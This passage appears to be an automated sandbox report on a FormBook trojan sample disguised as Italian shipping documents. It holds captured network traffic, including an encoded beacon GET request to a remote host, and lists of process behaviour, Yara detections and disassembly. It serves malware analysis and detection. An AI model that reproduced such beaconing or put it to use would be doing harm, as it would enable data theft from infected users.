                      Sep 22, 2024 18:04:30.090140104 CEST1236INData Raw: e7 a0 85 fe 27 f9 10 2b da 89 1f 40 b6 5d 2c 04 8b 48 6e 0b ca 74 d2 02 e4 3e ec 98 69 05 c5 50 5a f0 0e fe 3f a0 35 66 c1 15 1a 48 3e 61 2d b0 2f 43 4b f1 77 50 0b da fe f0 eb fd 37 e6 26 6b 30 18 0f 5a ed 9f 92 cf 53 b3 de 63 6b a6 cb 64 12 da
                      Data Ascii: '+@],Hnt>iPZ?5fH>a-/CKwP7&k0ZSckd!XL?"{c}Z@JvQ|`k}^YaeiZY&J>2JosBuEi)+]mC\,lp#SQo\Zr<SSO4#GmW
                      Sep 22, 2024 18:04:30.090668917 CEST1128INData Raw: 72 93 ef 2b 71 4f 81 9b 85 aa 98 6e 44 ed 03 85 a3 39 6f 65 aa f3 f5 23 53 5f 27 63 e1 9e a3 e5 74 e6 8e b3 29 03 41 37 03 21 ae 5e 71 07 3e 1a e0 22 ca fc dd 48 05 e3 35 e5 82 fd fd e0 9c eb 56 44 59 96 45 75 7a 36 92 62 c3 0f 20 2f 8d e1 a0 ff
                      Data Ascii: r+qOnD9oe#S_'ct)A7!^q>"H5VDYEuz6b /LWyOY@|/tm]77*rU41\;%Ey_r|](7TsK3;W>e=!N,k h_/|$R0`W*2vntp__7Rv


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.449765194.58.112.174801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:04:31.940951109 CEST485OUTGET /vyk8/?4rl8h=/8W9lHmy/meYp2fNs3efAdRvbFxf2DuKL4zSfhQhCqnq6Zc+yf7I5zlrSSPwb+CI3DZqbI5vil5mP2MKXHyCXZgHhQsXe7748Z5EYcVgGcHWqsQ0OU2KuuY=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.albero-dveri.online
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:04:32.644238949 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:04:32 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                      Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.albero-dveri.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                      Sep 22, 2024 18:04:32.644359112 CEST224INData Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61
                      Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.albero-dveri.online</h
                      Sep 22, 2024 18:04:32.644376993 CEST1236INData Raw: 31 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1
                      Data Ascii: 1><p class="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_s
                      Sep 22, 2024 18:04:32.645004988 CEST1236INData Raw: 6d 61 67 65 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e
                      Data Ascii: mage b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nb
                      Sep 22, 2024 18:04:32.645026922 CEST1236INData Raw: 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69
                      Data Ascii: ing" href="https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amo
                      Sep 22, 2024 18:04:32.645962954 CEST1236INData Raw: 6d 70 61 63 74 22 3e d0 93 d0 be d1 82 d0 be d0 b2 d1 8b d0 b5 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b
                      Data Ascii: mpact"> &nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp; &nb
                      Sep 22, 2024 18:04:32.645987034 CEST1236INData Raw: 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63
                      Data Ascii: www.albero-dveri.online&utm_medium=parking&utm_campaign=s_land_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image
                      Sep 22, 2024 18:04:32.647017956 CEST1236INData Raw: bb d0 b5 d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 ba d0 bb d0 b8 d0 b5 d0 bd d1 82 d0 be d0 b2 20 d0 b8 26 6e 62 73 70 3b d1 83 d0 bb d1 83 d1 87 d1 88 d0 b8 d1 82 d0 b5 20 d0 b5 d0 b3 d0 be 20 53 45 4f 2d d0 bf d0 be d0 ba d0 b0 d0 b7 d0 b0 d1 82 d0
                      Data Ascii: &nbsp; &nbsp; SEO-.</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="
                      Sep 22, 2024 18:04:32.647046089 CEST776INData Raw: 63 72 69 70 74 20 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 69 66 20 28 20 27 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 27 2e 6d 61 74 63 68 28 20 2f 78 6e 2d 2d 2f 20 29 20 26 26 20 64 6f 63 75 6d 65 6e
                      Data Ascii: cript );</script><script>if ( 'www.albero-dveri.online'.match( /xn--/ ) && document.querySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent'
                      Sep 22, 2024 18:04:32.647063971 CEST1145INData Raw: 20 3d 20 74 65 78 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 20 73 70 61 6e 73 5b 20 69 20 5d 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28 20 2f 5e 6e 6f 2d 70 75 6e 79 2f 20 29 20 29 20 7b 0a 20 20 20 20
                      Data Ascii: = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spans[ i ].style.display = 'none'; } } }</script>... Global site tag (gtag.js) - Google Analytics --><script async src="http


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:12:01:31
                      Start date:22/09/2024
                      Path:C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe"
                      Imagebase:0x400000
                      File size:1'398'875 bytes
                      MD5 hash:15FCFDE4BCDE8E7DCE181856E02B1B24
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:1
                      Start time:12:01:31
                      Start date:22/09/2024
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe"
                      Imagebase:0xa00000
                      File size:46'504 bytes
                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:12:02:02
                      Start date:22/09/2024
                      Path:C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe"
                      Imagebase:0x280000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:6
                      Start time:12:02:04
                      Start date:22/09/2024
                      Path:C:\Windows\SysWOW64\taskkill.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\taskkill.exe"
                      Imagebase:0x870000
                      File size:74'240 bytes
                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:false

                      General

                      Target ID:7
                      Start time:12:02:29
                      Start date:22/09/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff6bf500000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:3.5%
                        Dynamic/Decrypted Code Coverage:0.4%
                        Signature Coverage:8.8%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:36
                        execution_graph 84247 4010e0 84250 401100 84247->84250 84249 4010f8 84251 401113 84250->84251 84253 401120 84251->84253 84254 401184 84251->84254 84255 40114c 84251->84255 84281 401182 84251->84281 84252 40112c DefWindowProcW 84252->84249 84253->84252 84295 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 84253->84295 84288 401250 61 API calls __crtGetStringTypeA_stat 84254->84288 84257 401151 84255->84257 84258 40119d 84255->84258 84262 401219 84257->84262 84263 40115d 84257->84263 84260 4011a3 84258->84260 84261 42afb4 84258->84261 84259 401193 84259->84249 84260->84253 84272 4011b6 KillTimer 84260->84272 84273 4011db SetTimer RegisterWindowMessageW 84260->84273 84290 40f190 10 API calls 84261->84290 84262->84253 84264 401225 84262->84264 84267 401163 84263->84267 84268 42b01d 84263->84268 84306 468b0e 74 API calls __crtGetStringTypeA_stat 84264->84306 84269 42afe9 84267->84269 84270 40116c 84267->84270 84268->84252 84294 4370f4 52 API calls 84268->84294 84292 40f190 10 API calls 84269->84292 84270->84253 84274 401174 84270->84274 84271 42b04f 84296 40e0c0 84271->84296 84289 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 84272->84289 84273->84259 84279 401204 CreatePopupMenu 84273->84279 84291 45fd57 65 API calls __crtGetStringTypeA_stat 84274->84291 84279->84249 84281->84252 84282 42afe4 84282->84259 84283 42b00e 84293 401a50 331 API calls 84283->84293 84284 4011c9 PostQuitMessage 84284->84249 84287 42afdc 84287->84252 84287->84282 84288->84259 84289->84284 84290->84259 84291->84287 84292->84283 84293->84281 84294->84281 84295->84271 84298 40e0e7 __crtGetStringTypeA_stat 84296->84298 84297 40e142 84299 40e184 84297->84299 84329 4341e6 63 API calls __wcsicoll 84297->84329 84298->84297 84300 42729f DestroyIcon 84298->84300 84302 40e1a0 Shell_NotifyIconW 84299->84302 84303 4272db Shell_NotifyIconW 84299->84303 84300->84297 84307 401b80 84302->84307 84305 40e1ba 84305->84281 84306->84282 84308 401b9c 84307->84308 84328 401c7e 84307->84328 84330 4013c0 84308->84330 84311 42722b LoadStringW 84314 427246 84311->84314 84312 401bb9 84335 402160 84312->84335 84349 40e0a0 84314->84349 84315 401bcd 84316 427258 84315->84316 84317 401bda 84315->84317 84353 40d200 52 API calls 2 library calls 84316->84353 84317->84314 84319 401be4 84317->84319 84348 40d200 52 API calls 2 library calls 84319->84348 84322 427267 84323 42727b 84322->84323 84325 401bf3 _wcscpy __crtGetStringTypeA_stat _wcsncpy 84322->84325 84354 40d200 52 API calls 2 library calls 84323->84354 84327 401c62 Shell_NotifyIconW 84325->84327 84326 427289 84327->84328 84328->84305 84329->84299 84355 4115d7 84330->84355 84336 426daa 84335->84336 84337 40216b _wcslen 84335->84337 84393 40c600 84336->84393 84340 402180 84337->84340 84341 40219e 84337->84341 84339 426db5 84339->84315 84392 403bd0 52 API calls moneypunct 84340->84392 84343 4013a0 52 API calls 84341->84343 84345 4021a5 84343->84345 84344 402187 _memmove 84344->84315 84346 426db7 84345->84346 84347 4115d7 52 API calls 84345->84347 84347->84344 84348->84325 84350 40e0b2 84349->84350 84351 40e0a8 84349->84351 84350->84325 84405 403c30 52 API calls _memmove 84351->84405 84353->84322 84354->84326 84357 4115e1 _malloc 84355->84357 84358 4013e4 84357->84358 84362 4115fd std::exception::exception 84357->84362 84369 4135bb 84357->84369 84366 4013a0 84358->84366 84359 41163b 84384 4180af 46 API calls std::exception::operator= 84359->84384 84361 411645 84385 418105 RaiseException 84361->84385 84362->84359 84383 41130a 51 API calls __cinit 84362->84383 84365 411656 84367 4115d7 52 API calls 84366->84367 84368 4013a7 84367->84368 84368->84311 84368->84312 84370 413638 _malloc 84369->84370 84378 4135c9 _malloc 84369->84378 84391 417f77 46 API calls __getptd_noexit 84370->84391 84373 4135f7 RtlAllocateHeap 84373->84378 84382 413630 84373->84382 84375 413624 84389 417f77 46 API calls __getptd_noexit 84375->84389 84378->84373 84378->84375 84379 413622 84378->84379 84380 4135d4 84378->84380 84390 417f77 46 API calls __getptd_noexit 84379->84390 84380->84378 84386 418901 46 API calls 2 library calls 84380->84386 84387 418752 46 API calls 9 library calls 84380->84387 84388 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84380->84388 84382->84357 84383->84359 84384->84361 84385->84365 84386->84380 84387->84380 84389->84379 84390->84382 84391->84382 84392->84344 84394 40c619 84393->84394 84395 40c60a 84393->84395 84394->84339 84395->84394 84398 4026f0 84395->84398 84397 426d7a _memmove 84397->84339 84399 426873 84398->84399 84400 4026ff 84398->84400 84401 4013a0 52 API calls 84399->84401 84400->84397 84402 42687b 84401->84402 84403 4115d7 52 API calls 84402->84403 84404 42689e _memmove 84403->84404 84404->84397 84405->84350 84406 40bd20 84407 428194 84406->84407 84415 40bd2d 84406->84415 84408 40bd43 84407->84408 84409 4281bc 84407->84409 84411 4281b2 84407->84411 84428 45e987 86 API calls moneypunct 84409->84428 84427 40b510 VariantClear 84411->84427 84416 40bd37 84415->84416 84429 4531b1 85 API calls 5 library calls 84415->84429 84418 40bd50 84416->84418 84417 4281ba 84419 426cf1 84418->84419 84420 40bd63 84418->84420 84439 44cde9 52 API calls _memmove 84419->84439 84430 40bd80 84420->84430 84423 40bd73 84423->84408 84424 426cfc 84425 40e0a0 52 API calls 84424->84425 84426 426d02 84425->84426 84427->84417 84428->84415 84429->84416 84431 40bd8e 84430->84431 84438 40bdb7 _memmove 84430->84438 84432 40bded 84431->84432 84433 40bdad 84431->84433 84431->84438 84435 4115d7 52 API calls 84432->84435 84440 402f00 84433->84440 84436 40bdf6 84435->84436 84437 4115d7 52 API calls 84436->84437 84436->84438 84437->84438 84438->84423 84439->84424 84441 402f10 84440->84441 84442 402f0c 84440->84442 84443 4115d7 52 API calls 84441->84443 84444 4268c3 84441->84444 84442->84438 84445 402f51 moneypunct _memmove 84443->84445 84445->84438 84446 425ba2 84451 40e360 84446->84451 84448 425bb4 84467 41130a 51 API calls __cinit 84448->84467 84450 425bbe 84452 4115d7 52 API calls 84451->84452 84453 40e3ec GetModuleFileNameW 84452->84453 84468 413a0e 84453->84468 84455 40e421 _wcsncat 84471 413a9e 84455->84471 84458 4115d7 52 API calls 84459 40e45e _wcscpy 84458->84459 84474 40bc70 84459->84474 84463 40e4a9 84463->84448 84464 401c90 52 API calls 84466 40e4a1 _wcscat _wcslen _wcsncpy 84464->84466 84465 4115d7 52 API calls 84465->84466 84466->84463 84466->84464 84466->84465 84467->84450 84493 413801 84468->84493 84523 419efd 84471->84523 84475 4115d7 52 API calls 84474->84475 84476 40bc98 84475->84476 84477 4115d7 52 API calls 84476->84477 84478 40bca6 84477->84478 84479 40e4c0 84478->84479 84535 403350 84479->84535 84481 40e4cb RegOpenKeyExW 84482 427190 RegQueryValueExW 84481->84482 84483 40e4eb 84481->84483 84484 4271b0 84482->84484 84485 42721a RegCloseKey 84482->84485 84483->84466 84486 4115d7 52 API calls 84484->84486 84485->84466 84487 4271cb 84486->84487 84542 43652f 52 API calls 84487->84542 84489 4271d8 RegQueryValueExW 84490 4271f7 84489->84490 84492 42720e 84489->84492 84491 402160 52 API calls 84490->84491 84491->84492 84492->84485 84494 41381a 84493->84494 84495 41389e 84493->84495 84494->84495 84506 41388a 84494->84506 84515 419e30 46 API calls wcstoxl 84494->84515 84496 4139e8 84495->84496 84497 413a00 84495->84497 84520 417f77 46 API calls __getptd_noexit 84496->84520 84522 417f77 46 API calls __getptd_noexit 84497->84522 84500 4139ed 84521 417f25 10 API calls wcstoxl 84500->84521 84503 41396c 84503->84495 84504 413967 84503->84504 84507 41397a 84503->84507 84504->84455 84505 413929 84505->84495 84508 413945 84505->84508 84517 419e30 46 API calls wcstoxl 84505->84517 84506->84495 84514 413909 84506->84514 84516 419e30 46 API calls wcstoxl 84506->84516 84519 419e30 46 API calls wcstoxl 84507->84519 84508->84495 84508->84504 84510 41395b 84508->84510 84518 419e30 46 API calls wcstoxl 84510->84518 84514->84503 84514->84505 84515->84506 84516->84514 84517->84508 84518->84504 84519->84504 84520->84500 84521->84504 84522->84504 84524 419f13 84523->84524 84525 419f0e 84523->84525 84532 417f77 46 API calls __getptd_noexit 84524->84532 84525->84524 84530 419f2b 84525->84530 84527 419f18 84533 417f25 10 API calls wcstoxl 84527->84533 84529 40e454 84529->84458 84530->84529 84534 417f77 46 API calls __getptd_noexit 84530->84534 84532->84527 84533->84529 84534->84527 84536 403367 84535->84536 84537 403358 84535->84537 84538 4115d7 52 API calls 84536->84538 84537->84481 84539 403370 84538->84539 84540 4115d7 52 API calls 84539->84540 84541 40339e 84540->84541 84541->84481 84542->84489 84543 416454 84580 416c70 84543->84580 84545 416460 GetStartupInfoW 84547 416474 84545->84547 84581 419d5a HeapCreate 84547->84581 84548 4164cd 84549 4164d8 84548->84549 84665 41642b 46 API calls 3 library calls 84548->84665 84582 417c20 GetModuleHandleW 84549->84582 84552 4164de 84553 4164e9 __RTC_Initialize 84552->84553 84666 41642b 46 API calls 3 library calls 84552->84666 84601 41aaa1 GetStartupInfoW 84553->84601 84557 416503 GetCommandLineW 84614 41f584 GetEnvironmentStringsW 84557->84614 84561 416513 84620 41f4d6 GetModuleFileNameW 84561->84620 84563 41651d 84564 416528 84563->84564 84668 411924 46 API calls 3 library calls 84563->84668 84624 41f2a4 84564->84624 84567 41652e 84568 416539 84567->84568 84669 411924 46 API calls 3 library calls 84567->84669 84638 411703 84568->84638 84571 416541 84573 41654c __wwincmdln 84571->84573 84670 411924 46 API calls 3 library calls 84571->84670 84642 40d6b0 84573->84642 84576 41657c 84672 411906 46 API calls _doexit 84576->84672 84579 416581 __wfsopen 84580->84545 84581->84548 84583 417c34 84582->84583 84584 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84582->84584 84673 4178ff 49 API calls _free 84583->84673 84588 417c87 TlsAlloc 84584->84588 84586 417c39 84586->84552 84589 417cd5 TlsSetValue 84588->84589 84590 417d96 84588->84590 84589->84590 84591 417ce6 __init_pointers 84589->84591 84590->84552 84674 418151 InitializeCriticalSectionAndSpinCount 84591->84674 84593 417d91 84682 4178ff 49 API calls _free 84593->84682 84595 417d2a 84595->84593 84675 416b49 84595->84675 84598 417d76 84681 41793c 46 API calls 4 library calls 84598->84681 84600 417d7e GetCurrentThreadId 84600->84590 84602 416b49 __calloc_crt 46 API calls 84601->84602 84608 41aabf 84602->84608 84603 41ac6a GetStdHandle 84609 41ac34 84603->84609 84604 41acce SetHandleCount 84613 4164f7 84604->84613 84605 416b49 __calloc_crt 46 API calls 84605->84608 84606 41ac7c GetFileType 84606->84609 84607 41abb4 84607->84609 84610 41abe0 GetFileType 84607->84610 84611 41abeb InitializeCriticalSectionAndSpinCount 84607->84611 84608->84605 84608->84607 84608->84609 84608->84613 84609->84603 84609->84604 84609->84606 84612 41aca2 InitializeCriticalSectionAndSpinCount 84609->84612 84610->84607 84610->84611 84611->84607 84611->84613 84612->84609 84612->84613 84613->84557 84667 411924 46 API calls 3 library calls 84613->84667 84615 41f595 84614->84615 84616 41f599 84614->84616 84615->84561 84692 416b04 84616->84692 84618 41f5bb _memmove 84619 41f5c2 FreeEnvironmentStringsW 84618->84619 84619->84561 84621 41f50b _wparse_cmdline 84620->84621 84622 416b04 __malloc_crt 46 API calls 84621->84622 84623 41f54e _wparse_cmdline 84621->84623 84622->84623 84623->84563 84625 41f2bc _wcslen 84624->84625 84628 41f2b4 84624->84628 84626 416b49 __calloc_crt 46 API calls 84625->84626 84627 41f2e0 _wcslen 84626->84627 84627->84628 84629 41f336 84627->84629 84631 416b49 __calloc_crt 46 API calls 84627->84631 84632 41f35c 84627->84632 84635 41f373 84627->84635 84698 41ef12 46 API calls wcstoxl 84627->84698 84628->84567 84699 413748 84629->84699 84631->84627 84634 413748 _free 46 API calls 84632->84634 84634->84628 84705 417ed3 84635->84705 84637 41f37f 84637->84567 84639 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84638->84639 84641 411750 __IsNonwritableInCurrentImage 84639->84641 84724 41130a 51 API calls __cinit 84639->84724 84641->84571 84643 42e2f3 84642->84643 84644 40d6cc 84642->84644 84725 408f40 84644->84725 84646 40d707 84729 40ebb0 84646->84729 84649 40d737 84732 411951 84649->84732 84654 40d751 84744 40f4e0 SystemParametersInfoW SystemParametersInfoW 84654->84744 84656 40d75f 84745 40d590 GetCurrentDirectoryW 84656->84745 84658 40d767 SystemParametersInfoW 84659 40d794 84658->84659 84660 40d78d FreeLibrary 84658->84660 84661 408f40 VariantClear 84659->84661 84660->84659 84662 40d79d 84661->84662 84663 408f40 VariantClear 84662->84663 84664 40d7a6 84663->84664 84664->84576 84671 4118da 46 API calls _doexit 84664->84671 84665->84549 84666->84553 84671->84576 84672->84579 84673->84586 84674->84595 84677 416b52 84675->84677 84678 416b8f 84677->84678 84679 416b70 Sleep 84677->84679 84683 41f677 84677->84683 84678->84593 84678->84598 84680 416b85 84679->84680 84680->84677 84680->84678 84681->84600 84682->84590 84684 41f683 84683->84684 84685 